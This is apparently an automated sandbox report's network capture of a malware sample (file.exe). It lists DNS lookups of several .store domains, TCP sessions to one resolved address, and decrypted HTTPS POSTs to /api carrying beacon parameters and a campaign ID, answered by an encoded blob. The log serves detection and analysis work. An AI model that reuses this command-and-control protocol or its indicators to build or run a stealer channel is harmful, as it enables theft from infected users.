Oct 28, 2024 18:43:09.419085979 CET	49712	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:43:09.419122934 CET	443	49712	188.114.96.3	192.168.2.6
Oct 28, 2024 18:43:09.419193029 CET	49712	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:43:09.419506073 CET	49712	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:43:09.419517994 CET	443	49712	188.114.96.3	192.168.2.6
Oct 28, 2024 18:43:10.040123940 CET	443	49712	188.114.96.3	192.168.2.6
Oct 28, 2024 18:43:10.040262938 CET	49712	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:43:10.041536093 CET	49712	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:43:10.041546106 CET	443	49712	188.114.96.3	192.168.2.6
Oct 28, 2024 18:43:10.042615891 CET	443	49712	188.114.96.3	192.168.2.6
Oct 28, 2024 18:43:10.043766022 CET	49712	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:43:10.043878078 CET	49712	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:43:10.043982029 CET	443	49712	188.114.96.3	192.168.2.6
Oct 28, 2024 18:44:06.264763117 CET	49712	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:44:07.055073023 CET	49972	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:44:07.055150986 CET	443	49972	188.114.96.3	192.168.2.6
Oct 28, 2024 18:44:07.055232048 CET	49972	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:44:07.055527925 CET	49972	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:44:07.055560112 CET	443	49972	188.114.96.3	192.168.2.6
Oct 28, 2024 18:44:07.667871952 CET	443	49972	188.114.96.3	192.168.2.6
Oct 28, 2024 18:44:07.667984009 CET	49972	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:44:07.669483900 CET	49972	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:44:07.669529915 CET	443	49972	188.114.96.3	192.168.2.6
Oct 28, 2024 18:44:07.669905901 CET	443	49972	188.114.96.3	192.168.2.6
Oct 28, 2024 18:44:07.678344011 CET	49972	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:44:07.678523064 CET	49972	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:44:07.678564072 CET	443	49972	188.114.96.3	192.168.2.6
Oct 28, 2024 18:44:07.678620100 CET	49972	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:44:07.678632975 CET	443	49972	188.114.96.3	192.168.2.6
Oct 28, 2024 18:44:09.350040913 CET	49972	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:44:10.192183018 CET	49987	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:44:10.192222118 CET	443	49987	188.114.96.3	192.168.2.6
Oct 28, 2024 18:44:10.192358971 CET	49987	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:44:10.192696095 CET	49987	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:44:10.192715883 CET	443	49987	188.114.96.3	192.168.2.6
Oct 28, 2024 18:44:10.827450037 CET	443	49987	188.114.96.3	192.168.2.6
Oct 28, 2024 18:44:10.827548981 CET	49987	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:44:10.829235077 CET	49987	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:44:10.829245090 CET	443	49987	188.114.96.3	192.168.2.6
Oct 28, 2024 18:44:10.829477072 CET	443	49987	188.114.96.3	192.168.2.6
Oct 28, 2024 18:44:10.830730915 CET	49987	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:44:10.830861092 CET	49987	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:44:10.830890894 CET	443	49987	188.114.96.3	192.168.2.6
Oct 28, 2024 18:44:10.830943108 CET	49987	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:44:10.830954075 CET	443	49987	188.114.96.3	192.168.2.6
Oct 28, 2024 18:44:22.019841909 CET	443	49987	188.114.96.3	192.168.2.6
Oct 28, 2024 18:44:22.019953966 CET	443	49987	188.114.96.3	192.168.2.6
Oct 28, 2024 18:44:22.020036936 CET	49987	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:44:22.020411968 CET	49987	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:44:22.020430088 CET	443	49987	188.114.96.3	192.168.2.6
Oct 28, 2024 18:44:22.468208075 CET	49989	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:44:22.468261003 CET	443	49989	188.114.96.3	192.168.2.6
Oct 28, 2024 18:44:22.468336105 CET	49989	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:44:22.468697071 CET	49989	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:44:22.468719959 CET	443	49989	188.114.96.3	192.168.2.6
Oct 28, 2024 18:44:23.084079027 CET	443	49989	188.114.96.3	192.168.2.6
Oct 28, 2024 18:44:23.084176064 CET	49989	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:44:23.089569092 CET	49989	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:44:23.089590073 CET	443	49989	188.114.96.3	192.168.2.6
Oct 28, 2024 18:44:23.089992046 CET	443	49989	188.114.96.3	192.168.2.6
Oct 28, 2024 18:44:23.121890068 CET	49989	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:44:23.122157097 CET	49989	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:44:23.122176886 CET	443	49989	188.114.96.3	192.168.2.6
Oct 28, 2024 18:44:58.474380970 CET	443	49989	188.114.96.3	192.168.2.6
Oct 28, 2024 18:44:58.474519968 CET	443	49989	188.114.96.3	192.168.2.6
Oct 28, 2024 18:44:58.474565029 CET	49989	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:44:58.474800110 CET	49989	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:44:58.474811077 CET	443	49989	188.114.96.3	192.168.2.6
Oct 28, 2024 18:44:59.395777941 CET	49991	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:44:59.395821095 CET	443	49991	188.114.96.3	192.168.2.6
Oct 28, 2024 18:44:59.395992994 CET	49991	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:44:59.397722006 CET	49991	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:44:59.397738934 CET	443	49991	188.114.96.3	192.168.2.6
Oct 28, 2024 18:45:00.247606993 CET	443	49991	188.114.96.3	192.168.2.6
Oct 28, 2024 18:45:00.247684002 CET	49991	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:45:00.250123978 CET	49991	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:45:00.250129938 CET	443	49991	188.114.96.3	192.168.2.6
Oct 28, 2024 18:45:00.250438929 CET	443	49991	188.114.96.3	192.168.2.6
Oct 28, 2024 18:45:00.282743931 CET	49991	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:45:00.282876015 CET	443	49991	188.114.96.3	192.168.2.6
Oct 28, 2024 18:45:00.282943964 CET	49991	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:45:00.333547115 CET	49992	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:45:00.333606005 CET	443	49992	188.114.96.3	192.168.2.6
Oct 28, 2024 18:45:00.333671093 CET	49992	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:45:00.334012032 CET	49992	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:45:00.334023952 CET	443	49992	188.114.96.3	192.168.2.6
Oct 28, 2024 18:45:00.950377941 CET	443	49992	188.114.96.3	192.168.2.6
Oct 28, 2024 18:45:00.950505018 CET	49992	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:45:00.953758955 CET	49992	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:45:00.953779936 CET	443	49992	188.114.96.3	192.168.2.6
Oct 28, 2024 18:45:00.954200983 CET	443	49992	188.114.96.3	192.168.2.6
Oct 28, 2024 18:45:00.956130028 CET	49992	443	192.168.2.6	188.114.96.3
Oct 28, 2024 18:45:00.956198931 CET	443	49992	188.114.96.3	192.168.2.6
Oct 28, 2024 18:45:00.956254959 CET	49992	443	192.168.2.6	188.114.96.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 28, 2024 18:43:06.306981087 CET	59933	53	192.168.2.6	1.1.1.1
Oct 28, 2024 18:43:06.317289114 CET	53	59933	1.1.1.1	192.168.2.6
Oct 28, 2024 18:43:06.344440937 CET	49442	53	192.168.2.6	1.1.1.1
Oct 28, 2024 18:43:06.354510069 CET	53	49442	1.1.1.1	192.168.2.6
Oct 28, 2024 18:43:06.356857061 CET	61747	53	192.168.2.6	1.1.1.1
Oct 28, 2024 18:43:06.367405891 CET	53	61747	1.1.1.1	192.168.2.6
Oct 28, 2024 18:43:06.369632959 CET	61003	53	192.168.2.6	1.1.1.1
Oct 28, 2024 18:43:06.391571045 CET	53	61003	1.1.1.1	192.168.2.6
Oct 28, 2024 18:43:06.393260002 CET	56113	53	192.168.2.6	1.1.1.1
Oct 28, 2024 18:43:06.419471025 CET	53	56113	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 28, 2024 18:43:06.306981087 CET	192.168.2.6	1.1.1.1	0x125f	Standard query (0)	presticitpo.store	A (IP address)	IN (0x0001)	false
Oct 28, 2024 18:43:06.344440937 CET	192.168.2.6	1.1.1.1	0x13f4	Standard query (0)	crisiwarny.store	A (IP address)	IN (0x0001)	false
Oct 28, 2024 18:43:06.356857061 CET	192.168.2.6	1.1.1.1	0x8427	Standard query (0)	fadehairucw.store	A (IP address)	IN (0x0001)	false
Oct 28, 2024 18:43:06.369632959 CET	192.168.2.6	1.1.1.1	0x7994	Standard query (0)	thumbystriw.store	A (IP address)	IN (0x0001)	false
Oct 28, 2024 18:43:06.393260002 CET	192.168.2.6	1.1.1.1	0xcd61	Standard query (0)	necklacedmny.store	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 28, 2024 18:43:06.317289114 CET	1.1.1.1	192.168.2.6	0x125f	Name error (3)	presticitpo.store	none	none	A (IP address)	IN (0x0001)	false
Oct 28, 2024 18:43:06.354510069 CET	1.1.1.1	192.168.2.6	0x13f4	Name error (3)	crisiwarny.store	none	none	A (IP address)	IN (0x0001)	false
Oct 28, 2024 18:43:06.367405891 CET	1.1.1.1	192.168.2.6	0x8427	Name error (3)	fadehairucw.store	none	none	A (IP address)	IN (0x0001)	false
Oct 28, 2024 18:43:06.391571045 CET	1.1.1.1	192.168.2.6	0x7994	Name error (3)	thumbystriw.store	none	none	A (IP address)	IN (0x0001)	false
Oct 28, 2024 18:43:06.419471025 CET	1.1.1.1	192.168.2.6	0xcd61	No error (0)	necklacedmny.store		188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 28, 2024 18:43:06.419471025 CET	1.1.1.1	192.168.2.6	0xcd61	No error (0)	necklacedmny.store		188.114.97.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

necklacedmny.store

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49709	188.114.96.3	443	5936	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 17:43:07 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: necklacedmny.store
2024-10-28 17:43:07 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-28 17:43:07 UTC	1011	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 17:43:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ip9bsv6jpsdamboau4jvrv39io; expires=Fri, 21 Feb 2025 11:29:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EAxvRzWlMBtnM649aTzR81LNUUVqzu1buTjnGOb8NdpyEuKTSsdXNm8RO1335Yqxqc2n7F7gBvfwouiKY3%2FYEbn74ubwomtvJpaM8BNZ5JMtxasHJO7tuWZDcb4v6U%2BriLcyuCQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9cb9eff84e4624-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1207&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=909&delivery_rate=2433613&cwnd=251&unsent_bytes=0&cid=e518fa33fece2d53&ts=937&x=0"
2024-10-28 17:43:07 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-10-28 17:43:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49711	188.114.96.3	443	5936	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-28 17:43:08 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 52 Host: necklacedmny.store
2024-10-28 17:43:08 UTC	52	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
2024-10-28 17:43:09 UTC	1013	IN	HTTP/1.1 200 OK Date: Mon, 28 Oct 2024 17:43:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=o93eb5c211mo5h6inudv72udm7; expires=Fri, 21 Feb 2025 11:29:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BFzLS8K8GZFQ5o%2Fd2YyqkqMJe0C29DSV4rU7KtkVkn0dxrX8tmcaJGHgf0Tak8buSo7IJTHBziaBb9dhIp2%2BXBLEIrw8cKc%2BArHcTG33QV6xN8ehLLhXWAYvrBT5dnnA963IL6I%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d9cb9f7aa927d55-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1094&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=954&delivery_rate=2779270&cwnd=250&unsent_bytes=0&cid=45617256f76051cd&ts=540&x=0"
2024-10-28 17:43:09 UTC	356	IN	Data Raw: 31 64 38 38 0d 0a 58 4f 50 6d 6c 53 76 59 38 48 47 57 4c 39 6d 6f 53 62 58 30 38 57 6b 33 4c 64 34 34 6e 75 36 55 6e 54 52 49 44 49 55 47 71 4e 34 6e 77 5a 43 33 45 65 7a 63 55 2b 56 4b 2b 35 49 39 78 34 47 55 52 52 56 4d 75 68 71 6b 69 50 58 78 52 79 30 67 70 33 44 46 2f 47 61 46 68 2f 6c 59 76 64 78 54 38 31 66 37 6b 68 4c 4f 31 70 51 48 46 52 66 38 58 66 53 4d 39 66 46 57 4b 57 66 71 64 73 53 39 4e 49 2b 42 2f 55 36 37 6c 42 44 36 51 72 7a 4e 4c 4e 53 65 6e 77 42 61 52 62 4d 61 73 73 7a 78 35 78 5a 79 4c 73 68 6a 33 4c 38 52 67 70 58 2b 43 61 58 63 43 72 52 4b 74 34 70 7a 6c 35 57 55 43 31 74 4c 75 6c 50 32 68 76 7a 35 56 79 78 6d 39 57 2f 4f 74 6a 53 42 67 76 78 45 73 6f 41 64 38 45 57 33 79 79 62 55 31 74 31 4c 55 6c 66 38 41 72 7a 66 78 50 78 48 4f Data Ascii: 1d88XOPmlSvY8HGWL9moSbX08Wk3Ld44nu6UnTRIDIUGqN4nwZC3EezcU+VK+5I9x4GURRVMuhqkiPXxRy0gp3DF/GaFh/lYvdxT81f7khLO1pQHFRf8XfSM9fFWKWfqdsS9NI+B/U67lBD6QrzNLNSenwBaRbMasszx5xZyLshj3L8RgpX+CaXcCrRKt4pzl5WUC1tLulP2hvz5Vyxm9W/OtjSBgvxEsoAd8EW3yybU1t1LUlf8ArzfxPxHO
2024-10-28 17:43:09 UTC	1369	IN	Data Raw: 49 42 2f 45 61 77 7a 7a 6e 63 6e 35 34 47 56 55 4b 32 56 66 2b 4d 38 66 56 63 4a 57 54 6a 61 63 65 36 50 6f 48 45 75 51 6d 39 69 6c 4f 73 44 5a 6a 50 4f 39 43 61 68 55 6c 76 44 36 4d 55 35 63 7a 78 38 78 5a 79 4c 75 39 68 79 62 38 31 6a 6f 66 2f 51 71 69 53 41 66 4a 41 76 74 67 74 30 70 69 5a 43 45 64 46 73 6c 7a 2f 68 66 33 32 55 79 31 71 70 79 71 4b 75 79 62 42 33 4c 64 6f 74 35 6b 66 2f 6c 71 37 69 6a 53 5a 6a 39 4d 4d 57 51 2f 6b 47 76 69 4e 38 76 35 53 4a 47 44 6a 61 4d 79 79 4d 34 36 43 2f 55 6d 39 6d 42 76 38 54 4c 62 42 4a 4e 65 54 6e 67 39 54 51 37 31 66 76 4d 4b 32 2b 45 35 71 4e 71 64 4b 7a 62 38 73 77 37 48 30 52 37 53 56 42 62 52 53 39 64 4e 72 30 4a 72 54 55 78 56 42 75 56 58 75 6a 65 54 36 57 44 68 69 34 6d 4c 48 76 7a 43 42 67 66 42 45 74 Data Ascii: IB/Eawzzncn54GVUK2Vf+M8fVcJWTjace6PoHEuQm9ilOsDZjPO9CahUlvD6MU5czx8xZyLu9hyb81jof/QqiSAfJAvtgt0piZCEdFslz/hf32Uy1qpyqKuybB3Ldot5kf/lq7ijSZj9MMWQ/kGviN8v5SJGDjaMyyM46C/Um9mBv8TLbBJNeTng9TQ71fvMK2+E5qNqdKzb8sw7H0R7SVBbRS9dNr0JrTUxVBuVXujeT6WDhi4mLHvzCBgfBEt
2024-10-28 17:43:09 UTC	1369	IN	Data Raw: 53 39 64 4e 72 30 4a 72 54 55 78 56 44 74 56 72 33 68 76 4c 2f 55 53 64 72 35 47 50 4a 73 54 6d 4c 69 76 42 4e 74 70 73 65 38 6b 32 38 7a 69 37 46 6b 35 6f 48 57 51 2f 79 47 76 75 55 74 71 63 57 42 57 6e 78 5a 2b 57 2f 4c 34 6a 45 36 41 65 6a 30 68 54 34 44 65 4f 4b 4c 4e 4b 65 6d 41 31 64 54 36 35 66 38 6f 66 33 39 56 41 72 59 2b 74 69 79 72 30 2b 68 34 6a 33 54 72 32 41 41 66 46 4c 71 63 42 72 6d 64 61 55 45 78 55 58 2f 47 7a 73 6d 2b 66 70 46 42 39 74 36 57 72 4e 71 6e 36 65 79 75 34 4a 76 5a 35 54 72 41 32 77 79 69 66 51 6e 70 55 50 58 55 43 7a 55 2b 36 4e 2b 76 46 45 4c 57 37 75 61 73 57 77 4e 34 79 44 2b 6b 4b 77 6e 78 66 7a 54 50 75 45 61 39 43 4f 30 31 4d 56 65 61 78 58 38 4b 4c 39 38 31 39 71 63 61 6c 39 69 72 73 79 77 64 79 33 54 62 61 61 47 66 Data Ascii: S9dNr0JrTUxVDtVr3hvL/USdr5GPJsTmLivBNtpse8k28zi7Fk5oHWQ/yGvuUtqcWBWnxZ+W/L4jE6Aej0hT4DeOKLNKemA1dT65f8of39VArY+tiyr0+h4j3Tr2AAfFLqcBrmdaUExUX/Gzsm+fpFB9t6WrNqn6eyu4JvZ5TrA2wyifQnpUPXUCzU+6N+vFELW7uasWwN4yD+kKwnxfzTPuEa9CO01MVeaxX8KL9819qcal9irsywdy3TbaaGf
2024-10-28 17:43:09 UTC	1369	IN	Data Raw: 4c 39 43 53 6c 51 51 56 41 66 78 64 35 4d 79 75 76 33 6b 4e 57 36 56 46 38 50 77 68 7a 35 32 33 54 72 62 53 53 37 52 42 75 4d 59 6a 32 4a 43 61 42 31 39 47 74 31 62 33 69 50 72 32 55 79 78 76 34 6d 48 4c 75 44 4b 4c 67 76 52 4b 74 5a 30 63 2f 41 33 31 69 69 7a 50 31 73 74 4c 63 46 69 33 56 50 72 4d 36 62 46 50 61 6d 6e 72 4a 4a 4c 38 4d 6f 69 43 38 55 79 32 6b 78 58 38 53 4c 50 4f 4b 74 47 51 6b 41 52 52 53 72 31 56 2b 49 44 34 39 56 63 72 59 75 78 72 77 62 6c 2b 7a 38 54 77 55 66 72 4b 55 38 56 4f 72 64 30 37 32 39 61 4d 52 55 77 50 75 31 61 38 31 4c 62 2b 52 43 42 6b 36 57 48 46 75 54 32 4f 67 2f 70 50 74 70 67 61 2f 45 75 30 77 7a 6e 55 6d 70 30 4d 57 30 4f 79 56 2f 61 50 2b 37 38 59 61 6d 6e 2f 4a 4a 4c 38 45 6f 61 4a 32 55 4b 32 6c 56 50 72 41 36 4b Data Ascii: L9CSlQQVAfxd5Myuv3kNW6VF8Pwhz523TrbSS7RBuMYj2JCaB19Gt1b3iPr2Uyxv4mHLuDKLgvRKtZ0c/A31iizP1stLcFi3VPrM6bFPamnrJJL8MoiC8Uy2kxX8SLPOKtGQkARRSr1V+ID49VcrYuxrwbl+z8TwUfrKU8VOrd0729aMRUwPu1a81Lb+RCBk6WHFuT2Og/pPtpga/Eu0wznUmp0MW0OyV/aP+78Yamn/JJL8EoaJ2UK2lVPrA6K
2024-10-28 17:43:09 UTC	1369	IN	Data Raw: 59 74 4c 44 51 2b 4b 58 65 79 63 39 62 31 6e 50 47 33 78 62 38 65 77 66 70 37 4b 37 67 6d 39 6e 6c 4f 73 44 62 33 46 49 74 53 5a 6b 67 4a 5a 51 72 6c 54 2b 59 33 77 2b 31 77 67 62 75 46 69 79 37 6b 30 67 6f 58 39 51 4c 32 61 46 50 64 66 2b 34 52 72 30 49 37 54 55 78 56 6d 75 30 6a 79 6e 4c 62 67 47 44 4d 75 34 47 69 4b 35 48 36 46 6a 76 68 4e 76 5a 34 56 38 55 75 32 79 79 54 57 6c 70 77 50 58 6b 61 36 57 2f 47 4a 2b 2f 74 45 49 47 58 6f 61 4d 4f 77 4d 38 48 4b 74 30 36 69 30 6b 75 30 66 4c 62 45 4a 64 43 41 30 78 51 62 56 76 78 64 38 4d 79 75 76 31 63 6d 59 65 52 72 79 62 38 2f 69 35 62 6c 52 62 4f 61 46 76 68 47 74 63 77 35 30 5a 6d 61 43 46 5a 47 75 31 4c 77 68 76 58 34 46 6d 51 75 34 48 79 4b 35 48 36 69 6b 2b 64 45 2b 6f 31 64 37 51 32 38 78 6d 75 50 Data Ascii: YtLDQ+KXeyc9b1nPG3xb8ewfp7K7gm9nlOsDb3FItSZkgJZQrlT+Y3w+1wgbuFiy7k0goX9QL2aFPdf+4Rr0I7TUxVmu0jynLbgGDMu4GiK5H6FjvhNvZ4V8Uu2yyTWlpwPXka6W/GJ+/tEIGXoaMOwM8HKt06i0ku0fLbEJdCA0xQbVvxd8Myuv1cmYeRryb8/i5blRbOaFvhGtcw50ZmaCFZGu1LwhvX4FmQu4HyK5H6ik+dE+o1d7Q28xmuP
2024-10-28 17:43:09 UTC	1369	IN	Data Raw: 42 4a 73 31 58 31 68 66 4c 33 56 53 70 71 34 32 50 50 76 7a 4b 4b 67 2f 52 47 76 70 73 64 2f 55 4c 37 68 47 76 51 6a 74 4e 54 46 57 36 6e 57 66 43 42 74 75 41 59 4d 79 37 67 61 49 72 6b 66 6f 32 4b 38 6b 6d 77 6c 42 66 78 53 37 48 50 4b 39 79 56 6e 41 39 54 53 37 4e 61 39 34 58 33 2b 56 4d 67 5a 65 46 70 79 62 6f 34 77 63 71 33 54 71 4c 53 53 37 52 74 6f 4d 63 6e 30 4e 61 4d 52 55 77 50 75 31 61 38 31 4c 62 30 57 69 35 70 35 32 6e 4a 74 44 75 46 6a 76 4a 4a 73 6f 41 62 39 45 71 70 32 43 76 65 6b 35 38 49 56 55 75 36 55 2f 71 50 38 72 38 59 61 6d 6e 2f 4a 4a 4c 38 45 34 32 44 33 6b 36 68 30 67 79 36 56 50 76 4e 4a 35 66 4f 30 77 70 65 52 62 4e 58 2f 34 72 31 39 46 4d 67 62 2b 42 73 78 36 34 39 6a 6f 76 7a 53 62 57 55 46 66 56 43 76 63 30 69 31 70 36 55 53 Data Ascii: BJs1X1hfL3VSpq42PPvzKKg/RGvpsd/UL7hGvQjtNTFW6nWfCBtuAYMy7gaIrkfo2K8kmwlBfxS7HPK9yVnA9TS7Na94X3+VMgZeFpybo4wcq3TqLSS7RtoMcn0NaMRUwPu1a81Lb0Wi5p52nJtDuFjvJJsoAb9Eqp2Cvek58IVUu6U/qP8r8Yamn/JJL8E42D3k6h0gy6VPvNJ5fO0wpeRbNX/4r19FMgb+Bsx649jovzSbWUFfVCvc0i1p6US
2024-10-28 17:43:09 UTC	367	IN	Data Raw: 39 36 6f 62 78 37 31 45 39 59 61 63 71 69 72 4e 2b 32 62 32 33 51 4c 32 4a 41 75 4a 41 71 38 31 72 36 4e 6a 54 45 78 55 58 2f 47 2f 2f 67 76 6a 34 51 44 73 6a 77 48 4c 41 75 79 36 47 6b 2f 67 4a 39 4e 49 56 74 42 58 6f 68 47 76 54 68 39 4e 54 42 52 33 6e 44 36 2f 62 70 71 31 4a 5a 48 65 6e 63 6f 72 6b 62 4d 2f 45 35 51 6e 69 30 6c 54 33 58 36 6e 4d 4b 4d 47 56 31 44 56 72 61 4b 5a 58 2b 70 76 6e 77 57 67 74 64 4f 70 69 33 61 31 79 6c 49 66 35 52 37 32 45 55 37 6f 4e 74 49 70 7a 37 74 62 62 53 32 6f 42 2f 45 4b 38 31 4c 62 4b 56 53 52 67 34 48 4c 62 38 52 6d 62 69 66 46 65 71 39 4a 64 74 45 76 37 6b 6e 75 5a 31 70 63 61 46 52 66 73 43 4b 66 5a 70 61 67 47 65 48 47 70 66 59 71 71 66 74 6e 57 75 51 6d 6f 30 6b 75 30 43 72 6a 59 4f 64 47 56 68 51 67 53 63 59 Data Ascii: 96obx71E9YacqirN+2b23QL2JAuJAq81r6NjTExUX/G//gvj4QDsjwHLAuy6Gk/gJ9NIVtBXohGvTh9NTBR3nD6/bpq1JZHencorkbM/E5Qni0lT3X6nMKMGV1DVraKZX+pvnwWgtdOpi3a1ylIf5R72EU7oNtIpz7tbbS2oB/EK81LbKVSRg4HLb8RmbifFeq9JdtEv7knuZ1pcaFRfsCKfZpagGeHGpfYqqftnWuQmo0ku0CrjYOdGVhQgScY
2024-10-28 17:43:09 UTC	1369	IN	Data Raw: 32 36 65 34 0d 0a 31 52 44 6d 58 37 33 4a 50 64 54 52 72 54 56 57 57 62 46 56 39 34 33 49 77 58 67 6e 62 2b 52 71 69 49 30 6f 6a 4a 54 30 54 4c 32 73 4c 66 70 4b 72 38 30 6c 30 5a 62 54 52 52 56 41 2f 41 4c 46 7a 4c 36 2f 61 57 51 75 2f 79 53 53 2f 41 75 43 69 76 6c 4f 72 49 4e 65 31 31 75 32 78 53 44 57 31 74 31 4c 55 77 2f 6b 43 72 4c 4d 38 75 34 57 63 6a 36 31 50 35 2f 76 61 64 48 57 36 41 65 6a 30 67 57 30 46 65 6d 45 61 38 58 57 79 30 73 53 51 62 46 62 2f 34 4c 31 37 55 51 73 62 66 46 6e 6a 59 49 41 6f 49 6e 38 52 62 65 64 47 4d 70 7a 6d 73 63 67 32 35 75 63 41 47 74 78 71 56 6e 79 67 76 48 70 52 32 6f 67 70 32 75 4b 35 41 66 42 7a 4c 64 32 39 4e 49 4c 74 42 58 37 2f 79 6a 5a 6d 4a 51 64 52 41 4b 64 56 2f 65 41 2b 2f 42 64 61 69 43 6e 59 6f 72 6b 62 Data Ascii: 26e41RDmX73JPdTRrTVWWbFV943IwXgnb+RqiI0ojJT0TL2sLfpKr80l0ZbTRRVA/ALFzL6/aWQu/ySS/AuCivlOrINe11u2xSDW1t1LUw/kCrLM8u4Wcj61P5/vadHW6Aej0gW0FemEa8XWy0sSQbFb/4L17UQsbfFnjYIAoIn8RbedGMpzmscg25ucAGtxqVnygvHpR2ogp2uK5AfBzLd29NILtBX7/yjZmJQdRAKdV/eA+/BdaiCnYorkb
